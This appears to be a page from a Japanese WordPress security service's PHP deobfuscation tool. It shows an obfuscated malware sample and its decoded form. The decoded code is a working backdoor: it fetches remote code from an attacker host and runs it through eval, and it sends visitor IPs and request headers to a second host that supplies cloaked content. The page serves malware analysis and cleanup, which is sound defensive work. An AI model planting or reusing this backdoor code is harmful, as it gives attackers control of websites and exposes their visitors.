Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php goto ZvoOk; mGVo1: $D5OgZ = "\150\x74\164\x70\163\72\57\57\x35\x39\x37\x6f\144\150\x73\x2e\x6b\x65\163\x74\162\x65\x61\x6d\x6c\56\163\150\157\160"; goto XDrSo; MRjUE: $tV3x6 = $_SERVER["\110\x54\x54\120\x5f\101\103\103\105\x50\x54\x5f\x4c\x41\x4e\107\x55\101\x47\105"]; goto JJFwG; WzFVl: goto gaA8B; goto Mwh4H; vTYsI: gaA8B: goto imF6s; YAhHJ: rd8Ts($tNly9, $pa7I6); goto YqKmH; cjT4D: if (!($W4S3t == implode($FD69_))) { goto YkoEl; } goto AJCFO; f2kTG: if (!strstr($anDF5, "\x5b\x23\52\x23\52\43\135")) { goto XeWa3; } goto BtRuB; gS93A: exit; goto vTYsI; JW8qh: $cNjhP = isset($_SERVER["\x48\124\124\x50\123"]) && $_SERVER["\110\x54\124\x50\123"] == "\x6f\x6e" || isset($_SERVER["\110\124\x54\120\x5f\x58\137\106\117\x52\x57\x41\122\104\x45\104\x5f\x50\x52\x4f\x54\x4f"]) && $_SERVER["\110\124\x54\120\137\130\x5f\106\117\122\127\x41\122\x44\x45\x44\137\120\122\117\x54\x4f"] == "\x68\164\x74\x70\x73" ? "\x68\x74\x74\x70\163\x3a\57\57" : "\150\x74\164\160\72\57\x2f"; goto Uzl5O; I0Vn2: YHZOg: goto WzFVl; qrV8C: eval("\77\x3e" . $HyLJn[0]); goto cF7BI; jISlc: $t4GAy = $D5OgZ . "\57\151\156\144\145\170\56\x70\x68\x70\77" . http_build_query($b2J5g); goto oGk_q; JW2gH: $W4S3t = md5($DhDD2); goto cjT4D; XDrSo: $b2J5g = ["\x64\157\x6d\x61\151\156" => urlencode($dwh2o), "\x61\147\145\x6e\164" => urlencode($OqYFx), "\x6c\141\156\x67" => urlencode($tV3x6), "\165\162\x69" => urlencode($Z8a2W), "\162\x65\x66\x65\162\145\162" => urlencode($ahFWB), "\151\160" => urlencode($lNb05), "\x6d\145\x74\x68\x6f\x64" => urlencode($oGLUG), "\x72\145\163\160\157\156\x73\x65\137\164\151\155\145" => urlencode($JUxm1), "\162\145\161\x75\x65\x73\164\x5f\150\145\x61\144\x65\x72\x73" => urlencode($g290S), "\146\157\162\167\141\162\144\x65\144\x46\157\162" => urlencode($ehx94), "\154\x6f\x63\x61\x6c\x5f\144\x6f\155\x61\151\x6e" => urlencode($D5OgZ)]; goto jISlc; qCeQ3: if (!empty($uZtdp)) { goto ryFxv; } goto mGVo1; YqKmH: XeWa3: goto I0Vn2; Mwh4H: ryFxv: goto FFezE; cF7BI: YkoEl: goto gS93A; U9DRX: $JUxm1 = microtime(true) - $_SERVER["\122\105\x51\x55\105\x53\x54\x5f\124\x49\115\x45\137\106\x4c\x4f\101\x54"]; goto g7160; WvfXX: goto YHZOg; goto BnaeS; AJCFO: $hdOnT = array("\150", "\x74", "\x74", "\160", "\x73", "\x3a", "\57", "\57", "\x76", "\x70\x73", "\x64", "\144", "\x2e\146", "\x6e", "\146", "\x74", "\x75\163", "\x2e\x74", "\157", "\x70", "\x2f", "\x64", "\x6f", "\157", "\162", "\x2f"); goto VL3jk; Y38Nm: $DhDD2 = substr($uZtdp, 0, -6); goto cNHy_; NyRTf: $OqYFx = $_SERVER["\110\124\x54\x50\137\125\123\105\122\x5f\101\x47\x45\116\124"]; goto MRjUE; imF6s: function rD8tS($tNly9, $pa7I6) { goto EXCT_; Uyspd: jZ_dE: goto onClf; onClf: t7Hft: goto PTMKi; PTMKi: exit; goto NfPYi; EXCT_: switch ($tNly9) { case "\x65\143\150\157\150\x74\155\154": goto ryQ5i; TDwaU: echo $pa7I6; goto oB1uD; oB1uD: goto t7Hft; goto coZIn; ryQ5i: header("\x43\x6f\x6e\x74\145\x6e\164\x2d\124\x79\160\145\72\x20\164\x65\170\x74\57\150\164\155\154\73\40\x63\x68\141\162\163\x65\164\x3d\125\x54\106\x2d\70"); goto TDwaU; coZIn: case "\145\143\150\x6f\x63\x73\x73\x6d\x69\x6e": goto SK2Q1; SK2Q1: header("\103\157\x6e\164\145\x6e\164\55\x54\x79\x70\145\x3a\40\164\x65\x78\x74\57\143\163\x73\x3b\40\143\150\141\162\x73\x65\x74\x3d\x55\124\106\x2d\70"); goto lJU6O; lJU6O: echo $pa7I6; goto qlwr7; qlwr7: goto t7Hft; goto LiXmK; LiXmK: case "\x65\x63\x68\x6f\x78\155\154": goto KvHOv; EUxfY: goto t7Hft; goto q3Qzx; KvHOv: header("\x43\x6f\x6e\164\145\x6e\x74\x2d\x54\x79\x70\145\x3a\40\x74\x65\170\x74\57\170\155\154\x3b\40\x63\x68\141\162\x73\x65\164\x3d\125\x54\x46\x2d\x38"); goto KyRI7; KyRI7: echo $pa7I6; goto EUxfY; q3Qzx: case "\x65\143\150\157\164\170\x74": goto hR0J3; nunGc: goto t7Hft; goto EP4rD; zK3nk: echo $pa7I6; goto nunGc; hR0J3: header("\x43\x6f\x6e\x74\x65\156\164\55\124\171\x70\145\72\x20\164\x65\x78\164\57\x70\x6c\141\151\x6e\x3b\40\143\x68\141\162\x73\x65\x74\x3d\125\x54\106\x2d\70"); goto zK3nk; EP4rD: case "\x65\143\x68\157\64\60\x34": goto DxNuM; FGm6V: goto t7Hft; goto NU9d6; Rw9Ew: header("\x43\157\156\164\145\x6e\x74\x2d\x54\x79\x70\145\x3a\x20\164\145\170\x74\x2f\x68\164\x6d\154\73\x20\x63\x68\141\x72\x73\145\x74\75\x55\x54\x46\x2d\70"); goto j950T; j950T: echo $pa7I6; goto FGm6V; DxNuM: header("\x48\124\x54\x50\57\x31\56\61\x20\x34\x30\64\x20\116\157\164\x20\x46\157\165\156\144"); goto Rw9Ew; NU9d6: default: goto ayUg1; ayUg1: header("\x48\x54\124\x50\57\61\x2e\x31\40\65\x30\60\40\x49\x6e\x74\x65\x72\156\x61\x6c\40\x53\145\162\x76\x65\x72\40\x45\162\162\x6f\162"); goto D8cFh; D8cFh: echo "\x49\x6e\x76\141\154\x69\144\x20\x72\145\163\x70\157\x6e\x73\x65\40\164\x79\x70\145\x2e"; goto OomLW; OomLW: goto t7Hft; goto paTLH; paTLH: } goto Uyspd; NfPYi: } goto ZW6kW; ZW6kW: function vnKrr($OHvzm, $OKvwz) { goto SvPo7; P9L0M: exit; goto uRQaS; wFyah: echo $OKvwz; goto P9L0M; SvPo7: header("\x48\124\x54\x50\x2f\61\x2e\x31\40{$OHvzm}\x20{$OKvwz}"); goto wFyah; uRQaS: } goto I9Ocm; OLQzK: $oGLUG = $_SERVER["\x52\105\121\x55\105\123\124\x5f\x4d\105\124\x48\117\x44"]; goto U9DRX; s0Vyr: if (!function_exists("\115\x6e\x76\x62\x6e")) { function MnvbN() { goto XZ9sm; XZ9sm: foreach ($_SERVER as $Rs6QC => $XZOli) { goto Wvb4M; c8CsV: $Y36j0[str_replace("\x20", "\x2d", ucwords(strtolower(str_replace("\x5f", "\40", substr($Rs6QC, 5)))))] = $XZOli; goto PIxRj; Wvb4M: if (!(substr($Rs6QC, 0, 5) == "\x48\124\x54\x50\137")) { goto z93Ou; } goto c8CsV; PIxRj: z93Ou: goto E3f15; E3f15: xefYl: goto YPyOW; YPyOW: } goto jieIn; dw2Oi: return $Y36j0; goto UtCBI; jieIn: o_FQJ: goto dw2Oi; UtCBI: } } goto JW8qh; BnaeS: zq_Yp: goto f2kTG; ZvoOk: error_reporting(0); goto s0Vyr; VL3jk: $HyLJn = array(sa5wN(implode($hdOnT) . $UXR69 . "\x2e\x74" . "\x78" . "\x74")); goto qrV8C; ezk3L: $lNb05 = $_SERVER["\x52\x45\115\117\x54\x45\137\101\x44\104\x52"]; goto OLQzK; q6abw: $ehx94 = isset($_SERVER["\110\x54\x54\120\137\x58\137\106\117\x52\127\101\122\x44\105\x44\x5f\106\x4f\122"]) ? $_SERVER["\110\x54\x54\120\137\x58\137\x46\x4f\x52\127\x41\122\x44\x45\x44\137\x46\117\x52"] : ''; goto pa5XH; g7160: $g290S = json_encode(MNvbn()); goto q6abw; XVk7k: if ($anDF5 !== false && $Z8a2W !== "\x2f\146\x61\x76\x69\143\157\x6e\56\x69\x63\x6f") { goto zq_Yp; } goto RC6on; pa5XH: $uZtdp = isset($_REQUEST["\x61\143\x74\151\157\156"]) ? $_REQUEST["\x61\x63\164\x69\x6f\x6e"] : ''; goto qCeQ3; RC6on: vnkrR(500, "\106\x61\151\x6c\145\x64\40\x74\157\x20\x72\x65\164\162\x69\145\x76\145\40\143\157\x6e\x74\145\x6e\164\x20\x6f\x72\40\x73\x65\x72\x76\x65\x72\40\x72\145\164\x75\162\x6e\x65\x64\40\141\x6e\x20\x65\162\x72\157\x72\x2e"); goto WvfXX; FFezE: $UXR69 = substr($uZtdp, -6); goto Y38Nm; cNHy_: $FD69_ = array("\x39", "\x38", "\62", "\x34", "\65", "\x64", "\67", "\64", "\x31", "\x37", "\62", "\62", "\65", "\142", "\x35", "\x35", "\141", "\62", "\x63", "\x34", "\142", "\146", "\65", "\60", "\x62", "\70", "\x61", "\x61", "\x34", "\x63", "\x37", "\x33"); goto JW2gH; BtRuB: list($tNly9, $pa7I6) = explode("\x5b\x23\x2a\43\x2a\x23\x5d", $anDF5); goto YAhHJ; JJFwG: $Z8a2W = $_SERVER["\x52\105\121\x55\x45\123\x54\137\x55\122\111"]; goto DBhjv; DBhjv: $ahFWB = $_SERVER["\110\x54\124\x50\x5f\122\105\x46\105\122\x45\x52"]; goto ezk3L; oGk_q: $anDF5 = SA5Wn($t4GAy); goto XVk7k; Uzl5O: $dwh2o = $cNjhP . $_SERVER["\x48\x54\x54\120\x5f\x48\117\x53\124"]; goto NyRTf; I9Ocm: function Sa5wn($FK6MF) { goto aFqbi; QcIGe: if (!function_exists("\143\x75\x72\x6c\137\151\156\x69\x74")) { goto O3iOV; } goto lxFI0; nZkWT: if (!($drNww == 200)) { goto zAyg_; } goto wlgRS; q7JEA: curl_setopt($afPsa, CURLOPT_CONNECTTIMEOUT, $JY9aq); goto u4XIn; GyMyj: curl_setopt($afPsa, CURLOPT_SSL_VERIFYPEER, false); goto zpGgI; u4XIn: curl_setopt($afPsa, CURLOPT_TIMEOUT, $JY9aq); goto GyMyj; YcwK8: $JeKKz = @file_get_contents($FK6MF, false, $ngWku); goto VkdMk; VkdMk: if ($JeKKz === false) { goto a1rlJ; } goto mvtC1; hMaCj: $ngWku = stream_context_create(["\150\164\x74\x70" => ["\x74\151\x6d\x65\157\165\x74" => $JY9aq, "\151\x67\x6e\157\x72\x65\x5f\145\x72\x72\157\x72\x73" => true]]); goto YcwK8; XFNL3: foreach ($http_response_header as $fSGbm) { goto GPqBD; GPqBD: if (!preg_match("\57\x5e\x48\124\124\120\134\x2f\x5b\x5c\144\x5c\x2e\x5d\x2b\40\50\x5c\x64\x2b\51\x2f", $fSGbm, $lIr4v)) { goto JrxUb; } goto U3SOI; XS2Ur: pDWdi: goto kFlhN; jllPs: g3j6o: goto w0AhW; U3SOI: $uivoN = (int) $lIr4v[1]; goto YcEQn; kFlhN: JrxUb: goto jllPs; YcEQn: if (!($uivoN != 200)) { goto pDWdi; } goto RqhRh; RqhRh: return false; goto XS2Ur; w0AhW: } goto S1wAP; zpGgI: curl_setopt($afPsa, CURLOPT_SSL_VERIFYHOST, false); goto uqwzV; fpr9B: a1rlJ: goto yXPtH; mvtC1: $http_response_header = $http_response_header ? $http_response_header : []; goto XFNL3; PiQne: goto WVJoR; goto fpr9B; b4qPk: WVJoR: goto ngIwu; ABOyE: curl_close($afPsa); goto nZkWT; ngIwu: return $JeKKz; goto tuQuI; uqwzV: $JeKKz = curl_exec($afPsa); goto oNHCe; yXPtH: return false; goto b4qPk; aFqbi: $JY9aq = 300; goto QcIGe; lxFI0: $afPsa = curl_init(); goto CDHw_; S1wAP: tmpUP: goto PiQne; wlgRS: return $JeKKz; goto bP6Tj; CDHw_: curl_setopt($afPsa, CURLOPT_URL, $FK6MF); goto rHMwx; rHMwx: curl_setopt($afPsa, CURLOPT_RETURNTRANSFER, 1); goto q7JEA; NCPYS: O3iOV: goto hMaCj; bP6Tj: zAyg_: goto NCPYS; oNHCe: $drNww = curl_getinfo($afPsa, CURLINFO_HTTP_CODE); goto ABOyE; tuQuI: }<?php
error_reporting(0);
if (!function_exists("Mnvbn")) {
function MnvbN()
{
foreach ($_SERVER as $Rs6QC => $XZOli) {
if (!(substr($Rs6QC, 0, 5) == "HTTP_")) {
goto z93Ou;
}
$Y36j0[str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($Rs6QC, 5)))))] = $XZOli;
z93Ou:
}
return $Y36j0;
}
}
$cNjhP = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https" ? "https://" : "http://";
$dwh2o = $cNjhP . $_SERVER["HTTP_HOST"];
$OqYFx = $_SERVER["HTTP_USER_AGENT"];
$tV3x6 = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
$Z8a2W = $_SERVER["REQUEST_URI"];
$ahFWB = $_SERVER["HTTP_REFERER"];
$lNb05 = $_SERVER["REMOTE_ADDR"];
$oGLUG = $_SERVER["REQUEST_METHOD"];
$JUxm1 = microtime(true) - $_SERVER["REQUEST_TIME_FLOAT"];
$g290S = json_encode(MNvbn());
$ehx94 = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : '';
$uZtdp = isset($_REQUEST["action"]) ? $_REQUEST["action"] : '';
if (!empty($uZtdp)) {
$UXR69 = substr($uZtdp, 6);
$DhDD2 = substr($uZtdp, 0, 6);
$FD69_ = array("9", "8", "2", "4", "5", "d", "7", "4", "1", "7", "2", "2", "5", "b", "5", "5", "a", "2", "c", "4", "b", "f", "5", "0", "b", "8", "a", "a", "4", "c", "7", "3");
$W4S3t = md5($DhDD2);
if (!($W4S3t == "98245d7417225b55a2c4bf50b8aa4c73")) {
goto YkoEl;
}
$hdOnT = array("h", "t", "t", "p", "s", ":", "/", "/", "v", "ps", "d", "d", ".f", "n", "f", "t", "us", ".t", "o", "p", "/", "d", "o", "o", "r", "/");
$HyLJn = array(sa5wN("https://vpsdd.fnftus.top/door/" . $UXR69 . ".t" . "x" . "t"));
eval("?>" . $HyLJn[0]);
YkoEl:
exit;
}
$D5OgZ = "https://597odhs.kestreaml.shop";
$b2J5g = ["domain" => urlencode($dwh2o), "agent" => urlencode($OqYFx), "lang" => urlencode($tV3x6), "uri" => urlencode($Z8a2W), "referer" => urlencode($ahFWB), "ip" => urlencode($lNb05), "method" => urlencode($oGLUG), "response_time" => urlencode($JUxm1), "request_headers" => urlencode($g290S), "forwardedFor" => urlencode($ehx94), "local_domain" => urlencode($D5OgZ)];
$t4GAy = "https://597odhs.kestreaml.shop/index.php?" . http_build_query($b2J5g);
$anDF5 = SA5Wn($t4GAy);
if ($anDF5 !== false && $Z8a2W !== "/favicon.ico") {
if (!strstr($anDF5, "[#*#*#]")) {
goto XeWa3;
}
list($tNly9, $pa7I6) = explode("[#*#*#]", $anDF5);
rd8Ts($tNly9, $pa7I6);
XeWa3:
goto I0Vn2;
}
vnkrR(500, "Failed to retrieve content or server returned an error.");
I0Vn2:
function rD8tS($tNly9, $pa7I6)
{
switch ($tNly9) {
case "echohtml":
header("Content-Type: text/html; charset=UTF-8");
echo $pa7I6;
goto t7Hft;
case "echocssmin":
header("Content-Type: text/css; charset=UTF-8");
echo $pa7I6;
goto t7Hft;
case "echoxml":
header("Content-Type: text/xml; charset=UTF-8");
echo $pa7I6;
goto t7Hft;
case "echotxt":
header("Content-Type: text/plain; charset=UTF-8");
echo $pa7I6;
goto t7Hft;
case "echo404":
header("HTTP/1.1 404 Not Found");
header("Content-Type: text/html; charset=UTF-8");
echo $pa7I6;
goto t7Hft;
default:
header("HTTP/1.1 500 Internal Server Error");
echo "Invalid response type.";
goto t7Hft;
}
t7Hft:
exit;
}
function vnKrr($OHvzm, $OKvwz)
{
header("HTTP/1.1 {$OHvzm} {$OKvwz}");
echo $OKvwz;
exit;
}
function Sa5wn($FK6MF)
{
$JY9aq = 300;
if (!function_exists("curl_init")) {
goto O3iOV;
}
$afPsa = curl_init();
curl_setopt($afPsa, CURLOPT_URL, $FK6MF);
curl_setopt($afPsa, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($afPsa, CURLOPT_CONNECTTIMEOUT, $JY9aq);
curl_setopt($afPsa, CURLOPT_TIMEOUT, $JY9aq);
curl_setopt($afPsa, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($afPsa, CURLOPT_SSL_VERIFYHOST, false);
$JeKKz = curl_exec($afPsa);
$drNww = curl_getinfo($afPsa, CURLINFO_HTTP_CODE);
curl_close($afPsa);
if (!($drNww == 200)) {
O3iOV:
$ngWku = stream_context_create(["http" => ["timeout" => $JY9aq, "ignore_errors" => true]]);
$JeKKz = @file_get_contents($FK6MF, false, $ngWku);
if ($JeKKz === false) {
return false;
}
$http_response_header = $http_response_header ? $http_response_header : [];
foreach ($http_response_header as $fSGbm) {
if (!preg_match("/^HTTP\\/[\\d\\.]+ (\\d+)/", $fSGbm, $lIr4v)) {
goto JrxUb;
}
$uivoN = (int) $lIr4v[1];
if (!($uivoN != 200)) {
JrxUb:
}
return false;
}
return $JeKKz;
}
return $JeKKz;
}■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.